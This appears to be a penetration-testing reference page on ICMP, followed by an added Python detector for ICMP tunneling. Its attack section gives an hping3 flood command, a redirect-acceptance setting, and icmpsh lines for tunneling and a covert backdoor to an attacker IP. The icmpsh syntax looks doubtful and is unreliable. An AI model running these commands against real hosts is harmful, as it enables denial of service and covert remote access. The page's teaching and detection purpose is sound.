ICMP (Internet Control Message Protocol)

Default Port: Not applicable

ICMP (Internet Control Message Protocol) is a network layer protocol used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address. It is commonly used for diagnostics and troubleshooting in IP networks.

ICMP operates by exchanging control messages between devices, informing them about network conditions, errors, and various other operational states.

Connect

Ping Utility

The ping command is used to send ICMP Echo Request messages to a target host:

ping <target-ip>

Recon

Identifying ICMP Responses

You can use Nmap to check if a target host responds to ICMP requests:

nmap -sn -PE X.X.X.X

ICMP Unreachable Messages

Tools like hping3 can send custom ICMP Unreachable messages to test network reachability:

hping3 --icmp --icmptype 3 X.X.X.X

Enumeration

ICMP Echo Requests

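ping takes a single address per invocation, so enumerating live hosts on a network means sending one ICMP Echo Request to each address in the range (the loop below assumes a /24, with <network-prefix> standing for its first three octets):

for i in $(seq 1 254); do ping -c 1 -W 1 <network-prefix>.$i; done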

ICMP Time Exceeded Messages

Using traceroute, you can trace the route packets take to a destination and identify routers along the path:

traceroute <target-ip>

Attack Vectors

ICMP Redirect Attacks

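ICMP Redirect messages can be exploited to manipulate a host's routing table and redirect its traffic through an attacker-controlled device. Whether a Linux host accepts redirects is governed by the accept_redirects sysctl; the command below sets it to 1 (accept), and writing 0 instead disables acceptance: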

echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

ICMP Flood Attacks

ICMP Flood attacks involve overwhelming a target host with a large volume of ICMP Echo Requests:

hping3 --flood --icmp <target-ip>

Post-Exploitation

Ping Sweep

After gaining access to a network, performing a ping sweep can help identify live hosts:

nmap -sn <network-range>

ICMP Tunneling

ICMP Tunneling involves encapsulating other network protocols within ICMP packets to bypass network security measures:

icmpsh -t <target-ip>

ICMP Backdoor

Creating a backdoor using ICMP can provide a covert channel for communication:

icmpsh -b <attacker-ip>
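
Seen from the monitoring side, the ICMP Tunneling and ICMP Backdoor techniques above both carry data in Echo payloads, which ordinary ping does not do. The following is an added example, not part of the original page or of any tool it names: it parses raw ICMP messages, verifies the checksum, and flags Echo traffic that is oversized or whose reply does not echo the request. The function names, the 64-byte threshold and the sample messages are assumptions constructed for illustration.

```python
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8
MAX_PAYLOAD = 64  # assumed threshold: default ping payloads are 32 or 56 bytes

def checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum; returns 0 over a message with a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo(icmp_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Build an ICMP Echo message in memory (used only for the constructed samples)."""
    csum = checksum(struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload

def parse_icmp(msg: bytes):
    """Return (type, id, seq, payload), or None if truncated or the checksum fails."""
    if len(msg) < 8 or checksum(msg) != 0:
        return None
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", msg[:8])
    return icmp_type, ident, seq, msg[8:]

def review(messages):
    """Flag Echo traffic that does not behave like ordinary ping."""
    findings, pending = [], {}
    for i, msg in enumerate(messages):
        parsed = parse_icmp(msg)
        if parsed is None:
            findings.append((i, "malformed or bad checksum"))
            continue
        icmp_type, ident, seq, payload = parsed
        if icmp_type in (ECHO_REQUEST, ECHO_REPLY) and len(payload) > MAX_PAYLOAD:
            findings.append((i, "oversized echo payload"))
        if icmp_type == ECHO_REQUEST:
            pending[(ident, seq)] = payload  # remember what a genuine reply must echo
        elif icmp_type == ECHO_REPLY and pending.get((ident, seq), payload) != payload:
            findings.append((i, "reply payload differs from request"))
    return findings

# Constructed sample messages (not captured traffic); PING is the Windows ping pattern
PING = b"abcdefghijklmnopqrstuvwabcdefghi"
SAMPLES = [build_echo(*a) for a in (
    (ECHO_REQUEST, 1, 1, PING), (ECHO_REPLY, 1, 1, PING),
    (ECHO_REQUEST, 2, 1, b"A" * 32), (ECHO_REPLY, 2, 1, b"B" * 32),
    (ECHO_REQUEST, 3, 1, b"X" * 200))]
```

Calling review(SAMPLES) flags message 3 (the reply that carries different data than its request) and message 4 (the 200-byte payload), and passes the ordinary ping exchange in messages 0 and 1.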